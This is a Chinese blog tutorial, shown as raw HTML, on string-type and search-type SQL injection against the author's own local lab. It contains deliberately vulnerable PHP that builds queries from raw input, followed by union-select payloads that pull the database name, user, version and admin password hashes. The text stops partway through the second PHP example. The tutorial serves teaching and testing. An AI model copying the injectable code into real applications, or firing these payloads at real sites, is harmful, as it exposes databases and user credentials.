<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">
<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>


  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />









  <meta name="keywords" content="web安全," />





  <link rel="alternate" href="/atom.xml" title="smelond's Blog" type="application/atom+xml" />






<meta name="description" content="你若盛开，清风自来。当然，前面说过了sql注入，但是那只是基于数字型，当然还有其他类型，比如字符串型，搜索型，提交注入（GET、POST型）">
<meta name="keywords" content="web安全">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入之注入类型">
<meta property="og:url" content="http://smelond.com/2018/04/02/sql注入之注入类型/index.html">
<meta property="og:site_name" content="smelond&#39;s Blog">
<meta property="og:description" content="你若盛开，清风自来。当然，前面说过了sql注入，但是那只是基于数字型，当然还有其他类型，比如字符串型，搜索型，提交注入（GET、POST型）">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://smelond.com/image_upload/2018/03/20180402104313.png">
<meta property="og:image" content="http://smelond.com/image_upload/2018/03/20180402113309.png">
<meta property="og:image" content="http://smelond.com/image_upload/2018/03/20180402114631.png">
<meta property="og:image" content="http://smelond.com/image_upload/2018/03/20180402153324.png">
<meta property="og:image" content="http://smelond.com/image_upload/2018/03/20180402153636.png">
<meta property="og:image" content="http://smelond.com/image_upload/2018/03/20180402154954.png">
<meta property="og:image" content="http://smelond.com/image_upload/2018/03/20180402161702.png">
<meta property="og:image" content="http://smelond.com/image_upload/2018/03/20180402163912.png">
<meta property="og:updated_time" content="2018-04-04T02:36:52.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="sql注入之注入类型">
<meta name="twitter:description" content="你若盛开，清风自来。当然，前面说过了sql注入，但是那只是基于数字型，当然还有其他类型，比如字符串型，搜索型，提交注入（GET、POST型）">
<meta name="twitter:image" content="http://smelond.com/image_upload/2018/03/20180402104313.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://smelond.com/2018/04/02/sql注入之注入类型/"/>





  <title>sql注入之注入类型 | smelond's Blog</title>
  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?326f6a55c7fb470522fcb98f22260a79";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">smelond's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">徒然</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://smelond.com/2018/04/02/sql注入之注入类型/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="smelond">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/uploads/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="smelond's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">sql注入之注入类型</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-04-02T08:51:30+08:00">
                2018-04-02
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web安全/" itemprop="url" rel="index">
                    <span itemprop="name">web安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2018/04/02/sql注入之注入类型/" class="leancloud_visitors" data-flag-title="sql注入之注入类型">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          
              <div class="post-description">
                  <blockquote class="blockquote-center">你若盛开，清风自来。</blockquote>当然，前面说过了sql注入，但是那只是基于数字型，当然还有其他类型，比如字符串型，搜索型，提交注入（GET、POST型）
              </div>
          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="数字型"><a href="#数字型" class="headerlink" title="数字型"></a>数字型</h2><p>数字型在上一篇文章<a href="/2018/03/28/sql注入之入门/" title="sql注入之入门">sql注入之入门</a>，已经讲过</p>
<h3 id="数字型简单的判断是否有注入"><a href="#数字型简单的判断是否有注入" class="headerlink" title="数字型简单的判断是否有注入"></a>数字型简单的判断是否有注入</h3><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">and 1=1		//返回正常</span><br><span class="line">and 1=2		//返回错误</span><br></pre></td></tr></table></figure>
<p><br></p>
<hr>
<p><br></p>
<h2 id="字符串型"><a href="#字符串型" class="headerlink" title="字符串型"></a>字符串型</h2><h3 id="如何判断字符串型是否有注入"><a href="#如何判断字符串型是否有注入" class="headerlink" title="如何判断字符串型是否有注入"></a>如何判断字符串型是否有注入</h3><p>首先先创建一个数据库，在里面分别创建两个表，admin，page，然后在里面插入数据<br><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; create database sqlinstr default character set utf8 collate utf8_general_ci;</span><br><span class="line">mysql&gt; use sqlinstr;</span><br><span class="line">mysql&gt; create table admin(</span><br><span class="line">       id int(3) auto_increment not null primary key,</span><br><span class="line">       username varchar(15) not null,</span><br><span class="line">       password char(32));</span><br><span class="line">mysql&gt; create table page(</span><br><span class="line">       id int(3) auto_increment not null primary key,</span><br><span class="line">       title varchar(20),</span><br><span class="line">       content varchar(255));</span><br><span class="line">mysql&gt; insert into admin(username,password) values('smelond','efe6398127928f1b2e9ef3207fb82663');</span><br><span class="line">mysql&gt; insert into admin(username,password) values('admin','efe6398127928f1b2e9ef3207fb82663');</span><br><span class="line">mysql&gt; insert into page(title,content) values('sqlzhuru','https://smelond.com');</span><br><span class="line">mysql&gt; insert into page(title,content) values('test','smelond.com');</span><br></pre></td></tr></table></figure></p>
<p>拿着我们的php代码：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;&lt;head&gt;</span><br><span class="line">	&lt;meta charset=<span class="string">"utf-8"</span>&gt;</span><br><span class="line">	&lt;title&gt;sql注入-注入类型-字符串&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;!--</span><br><span class="line">author: smelond</span><br><span class="line">filename: index.php</span><br><span class="line">blog: http:<span class="comment">//smelond.com</span></span><br><span class="line">sql注入-注入类型-字符串</span><br><span class="line">--&gt;</span><br><span class="line">&lt;body/&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	$id = $_GET[<span class="string">'x'</span>];</span><br><span class="line">	$link=mysqli_connect(<span class="string">"127.0.0.1"</span>,<span class="string">"root"</span>,<span class="string">"root"</span>,<span class="string">"sqlinstr"</span>);<span class="comment">//连接sqlinstr数据库</span></span><br><span class="line">	<span class="keyword">if</span> ($link) &#123;<span class="comment">//判断数据库是否存在</span></span><br><span class="line">		mysqli_query($link,<span class="string">"set names utf8"</span>);<span class="comment">//设置编码格式</span></span><br><span class="line">		$sql=<span class="string">"select * from page where id='$id'"</span>;<span class="comment">//查询</span></span><br><span class="line">		$re=mysqli_query($link,$sql);<span class="comment">//执行查询语句</span></span><br><span class="line">		$data=mysqli_fetch_assoc($re);<span class="comment">//获取数据库返回的内容</span></span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"文章id："</span>.$data[<span class="string">'id'</span>].<span class="string">"&lt;hr /&gt;"</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"文章标题："</span>.$data[<span class="string">'title'</span>].<span class="string">"&lt;hr /&gt;"</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"文章内容："</span>.$data[<span class="string">'content'</span>].<span class="string">"&lt;hr /&gt;"</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"当前执行sql语句："</span>.$sql;</span><br><span class="line">	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"好像出错了，原因有很多...所以你先去看看你的数据库配置好没。。。"</span>;</span><br><span class="line">	&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>打开我们的网址<a href="http://127.0.0.1/webpentest/str/index.php" target="_blank" rel="noopener">http://127.0.0.1/webpentest/str/index.php</a><br>打开会后看到下面的当前执行sql语句：select * from page where id=’’<br>传值进去：</p>
<blockquote>
<p>文章id：1文章标题：sqlzhuru<br>文章内容：<a href="https://smelond.com">https://smelond.com</a><br>当前执行sql语句：select * from page where id=’1’<br>这个时候内容已经查询出来了，但是发现后面的id=’1’，1被单引号括起来了</p>
</blockquote>
<h4 id="如何注入"><a href="#如何注入" class="headerlink" title="如何注入"></a>如何注入</h4><p>首先我们试试：<br>and 1=1<br><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/webpentest/str/index.php?x=1 and 1=1 	//结果返回正常</span><br><span class="line">当前执行sql语句：select * from page where id='1 and 1=1'  //有没有发现这里怪怪的</span><br></pre></td></tr></table></figure></p>
<p>and 1=2<br><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/webpentest/str/index.php?x=1 and 1=2	//结果还是返回正常，难道没有注入？？？</span><br><span class="line">当前执行sql语句：select * from page where id='1 and 1=2'</span><br></pre></td></tr></table></figure></p>
<p>从上面我们看到：id=’1 and 1=1’ 和 id=’1 and 1=2’，发现我们输入进去的内容全部被’’包裹起来了<br>那为什么会返回正常呢？<br>打开mysql：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select id from page where id='1 and 1=1';</span><br><span class="line">+<span class="comment">----+</span></span><br><span class="line">| id |</span><br><span class="line">+<span class="comment">----+</span></span><br><span class="line">|  1 |</span><br><span class="line">+<span class="comment">----+</span></span><br><span class="line">1 row in <span class="keyword">set</span>, <span class="number">1</span> <span class="keyword">warning</span> (<span class="number">0.00</span> sec)</span><br><span class="line"></span><br><span class="line">mysql&gt; <span class="keyword">select</span> <span class="keyword">id</span> <span class="keyword">from</span> page <span class="keyword">where</span> <span class="keyword">id</span>=<span class="string">'1 and 1=2'</span>;</span><br><span class="line">+<span class="comment">----+</span></span><br><span class="line">| id |</span><br><span class="line">+<span class="comment">----+</span></span><br><span class="line">|  1 |</span><br><span class="line">+<span class="comment">----+</span></span><br><span class="line">1 row in <span class="keyword">set</span>, <span class="number">1</span> <span class="keyword">warning</span> (<span class="number">0.00</span> sec)</span><br></pre></td></tr></table></figure></p>
<p>这回知道为什么会有返回值了吧，可以看出空格后面的应该是直接被截断了，所有理论上查询的还是id=1</p>
<h3 id="如何突破"><a href="#如何突破" class="headerlink" title="如何突破"></a>如何突破</h3><p>由于看到上面每一条sql语句后面都有一个’单引号，前面也有一个<br>所以我们可以在id=1后面加上一个’单引号，看一下是什么效果<br><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/webpentest/str/index.php?x=1'</span><br></pre></td></tr></table></figure></p>
<p>当我们执行这个网址时，发现页面报错了，这个时候应该就可以判断是否有注入了<br>报错，表示他应该是从数据库里面查询的<br>报错信息：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given <span class="keyword">in</span> D:\phpStudy\PHPTutorial\WWW\webpentest\str\index.php on line 21</span><br></pre></td></tr></table></figure></p>
<p>下面有当前执行sql语句：select * from page where id=’1’’ </p>
<p>可以看到1’成功的带入进去了</p>
<p>接下来继续构造注入语句：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">x=1' and '1'='1</span><br><span class="line">http://127.0.0.1/webpentest/str/index.php?x=1' and '1'='1</span><br></pre></td></tr></table></figure></p>
<p>那么执行的语句将会是这样的<br><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">当前执行sql语句：select * from page where id='1' and '1'='1'</span><br></pre></td></tr></table></figure></p>
<p>上面我们又看到id=’1’ and ‘1’=’1’，并且页面返回正常了，这回没毛病了吧，哈哈哈！！！</p>
<p>接着构造语句：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">x=1' and '1'='2</span><br></pre></td></tr></table></figure></p>
<p>执行语句：<br><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/webpentest/str/index.php?x=1' and '1'='2</span><br></pre></td></tr></table></figure></p>
<p>现在已经有了我们想要的结果了，页面没有正常显示<br>当前执行的sql语句：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> page <span class="keyword">where</span> <span class="keyword">id</span>=<span class="string">'1'</span> <span class="keyword">and</span> <span class="string">'1'</span>=<span class="string">'2'</span></span><br></pre></td></tr></table></figure></p>
<h3 id="使用一些常用的关键字"><a href="#使用一些常用的关键字" class="headerlink" title="使用一些常用的关键字"></a>使用一些常用的关键字</h3><p>那么，order by在哪里加？在这里，其实order by是不起作用的<br>已经可以看出，and ‘1’=’1后面是不能加了，如果加上去，语句会变成<br>但是加到前面，无论order by number=? 都会是正常返回值，所以，这个地方order by不能用<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> page <span class="keyword">where</span> <span class="keyword">id</span>=<span class="string">'1'</span> <span class="keyword">and</span> <span class="string">'1'</span>=<span class="string">'1 order by 3'</span> </span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> page <span class="keyword">where</span> <span class="keyword">id</span>=<span class="string">'1'</span> <span class="keyword">and</span> <span class="string">'1'</span>=<span class="string">'2 order by 3'</span> </span><br><span class="line"><span class="keyword">http</span>://<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>/webpentest/<span class="keyword">str</span>/index.php?x=<span class="number">1</span><span class="string">' order by 3 and '</span><span class="number">1</span><span class="string">'='</span><span class="number">1</span> //页面返回正常</span><br><span class="line"><span class="keyword">http</span>://<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>/webpentest/<span class="keyword">str</span>/index.php?x=<span class="number">1</span><span class="string">' order by 4 and '</span><span class="number">1</span><span class="string">'='</span><span class="number">1</span> //页面返回正常</span><br><span class="line"><span class="keyword">http</span>://<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>/webpentest/<span class="keyword">str</span>/index.php?x=<span class="number">1</span><span class="string">' order by 100 and '</span><span class="number">1</span><span class="string">'='</span><span class="number">1</span> //页面返回正常</span><br></pre></td></tr></table></figure></p>
<p>看到上面的100都能返回正常，但是我们数据库里面的page表只有3个字段，所以，可以看出order by在这里是有问题的</p>
<p>既然order by有问题，那我们试试select会怎么样？</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/webpentest/str/index.php?x=1' and 1=2 union select 1 and '1'='1 //页面报错</span><br><span class="line">http://127.0.0.1/webpentest/str/index.php?x=1' and 1=2 union select 1,2 and '1'='1 //页面报错</span><br><span class="line">http://127.0.0.1/webpentest/str/index.php?x=1' and 1=2 union select 1,2,3 and '1'='1 //页面正常显示</span><br><span class="line">http://127.0.0.1/webpentest/str/index.php?x=1' and 1=2 union select 1,2,3,4 and '1'='1  //页面报错</span><br></pre></td></tr></table></figure>
<p>select 已经判断出来了有三个字段，在一般情况下，select 1是不会报错的，在字段总数以前都不会报错，可能使我这里的php代码写的有问题，才导致了这种情况发生</p>
<p>接着查询一下数据库里版本，用户等等：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/webpentest/str/index.php?x=1' and 1=2 union <span class="keyword">select</span> <span class="keyword">concat</span>(<span class="keyword">database</span>(),<span class="string">'---'</span>,<span class="keyword">user</span>(),<span class="string">'---'</span>,<span class="keyword">version</span>()),<span class="number">2</span>,<span class="number">3</span> <span class="keyword">and</span> <span class="string">'1'</span>=<span class="string">'2</span></span><br></pre></td></tr></table></figure></p>
<p>结果：<br><a href="mailto:sqlinstr---root@localhost---5.5.53" target="_blank" rel="noopener">sqlinstr---root@localhost---5.5.53</a></p>
<p>剩下的爆库爆表前面里面已经说过了</p>
<p>但是有一个地方不同，在查询表时，后面的条件需要改动。<br>需要将and ‘1’=’2 改为where ‘1’=’1<br>为什么？<br>接下来我们又进入mysql中查询<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select username,password from admin and '1'='2';</span><br><span class="line">ERROR 1064 (42000): You have an error in your SQL syntax; <span class="keyword">check</span> the <span class="keyword">manual</span> that corresponds <span class="keyword">to</span> your MySQL <span class="keyword">server</span> <span class="keyword">version</span> <span class="keyword">for</span> the <span class="keyword">right</span> syntax <span class="keyword">to</span> <span class="keyword">use</span> near <span class="string">'and '</span><span class="number">1</span><span class="string">'='</span><span class="number">2</span><span class="string">''</span> <span class="keyword">at</span> line <span class="number">1</span></span><br><span class="line">那试试<span class="keyword">and</span> <span class="string">'1'</span>=<span class="string">'1'</span></span><br><span class="line">mysql&gt; <span class="keyword">select</span> username,<span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">admin</span> <span class="keyword">and</span> <span class="string">'1'</span>=<span class="string">'1'</span>;</span><br><span class="line">ERROR 1064 (42000): You have an error in your SQL syntax; <span class="keyword">check</span> the <span class="keyword">manual</span> that corresponds <span class="keyword">to</span> your MySQL <span class="keyword">server</span> <span class="keyword">version</span> <span class="keyword">for</span> the <span class="keyword">right</span> syntax <span class="keyword">to</span> <span class="keyword">use</span> near <span class="string">'and '</span><span class="number">1</span><span class="string">'='</span><span class="number">1</span><span class="string">''</span> <span class="keyword">at</span> line <span class="number">1</span></span><br></pre></td></tr></table></figure></p>
<p>结果都报错了<br>那现在该怎么办呢？<br>所以我想问，你有见过查询语句完了之后在后面加上and的吗？<br>所以这个地方得加上条件where<br>如何加？<br>1=1 , ‘1’=’1’<br>所以可已用where ‘1’=’1’<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select username,password from admin where '1'='1';</span><br><span class="line">+<span class="comment">----------+----------------------------------+</span></span><br><span class="line">| username | password                         |</span><br><span class="line">+<span class="comment">----------+----------------------------------+</span></span><br><span class="line">| smelond  | efe6398127928f1b2e9ef3207fb82663 |</span><br><span class="line">| admin    | efe6398127928f1b2e9ef3207fb82663 |</span><br><span class="line">+<span class="comment">----------+----------------------------------+</span></span><br><span class="line">2 rows in <span class="keyword">set</span> (<span class="number">0.00</span> sec)   //现在成功了吧</span><br></pre></td></tr></table></figure></p>
<p>构造sql语句：<br><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/webpentest/str/index.php?x=1' and 1=2 union select username,password,3 from admin where '1'='1</span><br></pre></td></tr></table></figure></p>
<p>密码就这样爆出来了</p>
<p><img src="/image_upload/2018/03/20180402104313.png" alt="Alt text"></p>
<p><br></p>
<hr>
<p><br></p>
<h2 id="搜索型"><a href="#搜索型" class="headerlink" title="搜索型"></a>搜索型</h2><p>看了上面的字符串型，好像也不难，就是单引号问题<br>接下来，我们来看看搜索型<br>搜索型一般出现在搜索框当中，我这里写了一个简单的搜索页面标题，返回页面内容的php代码<br>数据库我们还是用上面的sqlinstr数据库<br>代码贴上：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;&lt;head&gt;</span><br><span class="line">	&lt;meta charset=<span class="string">"utf-8"</span>&gt;</span><br><span class="line">	&lt;title&gt;sql注入-注入类型-搜索型&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;!--</span><br><span class="line">author: smelond</span><br><span class="line">filename: index.php</span><br><span class="line">blog: http:<span class="comment">//smelond.com</span></span><br><span class="line">sql注入-注入类型-搜索型</span><br><span class="line">--&gt;</span><br><span class="line">&lt;form action=<span class="string">""</span>&gt;</span><br><span class="line">&lt;input type=<span class="string">"text"</span> name=<span class="string">"x"</span> id=<span class="string">""</span>&gt;	<span class="comment">//文本框</span></span><br><span class="line">&lt;input type=<span class="string">"submit"</span> name=<span class="string">""</span> id=<span class="string">""</span> value=<span class="string">"搜素"</span>&gt;	<span class="comment">//提交按钮</span></span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;body/&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	$title = $_GET[<span class="string">'x'</span>];   <span class="comment">//接收x变量，上面文本框的值</span></span><br><span class="line">	$link=mysqli_connect(<span class="string">"127.0.0.1"</span>,<span class="string">"root"</span>,<span class="string">"root"</span>,<span class="string">"sqlinstr"</span>);<span class="comment">//连接sqlinstr数据库</span></span><br><span class="line">	<span class="keyword">if</span> ($link) &#123;<span class="comment">//判断数据库是否存在</span></span><br><span class="line">		mysqli_query($link,<span class="string">"set names utf8"</span>);<span class="comment">//设置编码格式</span></span><br><span class="line">		$sql=<span class="string">"select * from page where title like '%$title%'"</span>;<span class="comment">//查询，使用了like关键字，查找输入的内容</span></span><br><span class="line">		<span class="keyword">if</span> ($sql == <span class="string">"select * from page where title like '%%'"</span>) &#123;</span><br><span class="line">			<span class="keyword">continue</span>;</span><br><span class="line">		&#125;</span><br><span class="line">		$re=mysqli_query($link,$sql);<span class="comment">//执行查询语句</span></span><br><span class="line">		$data=mysqli_fetch_assoc($re);<span class="comment">//获取数据库返回的内容</span></span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"文章id："</span>.$data[<span class="string">'id'</span>].<span class="string">"&lt;hr /&gt;"</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"文章标题："</span>.$data[<span class="string">'title'</span>].<span class="string">"&lt;hr /&gt;"</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"文章内容："</span>.$data[<span class="string">'content'</span>].<span class="string">"&lt;hr /&gt;"</span>;</span><br><span class="line">		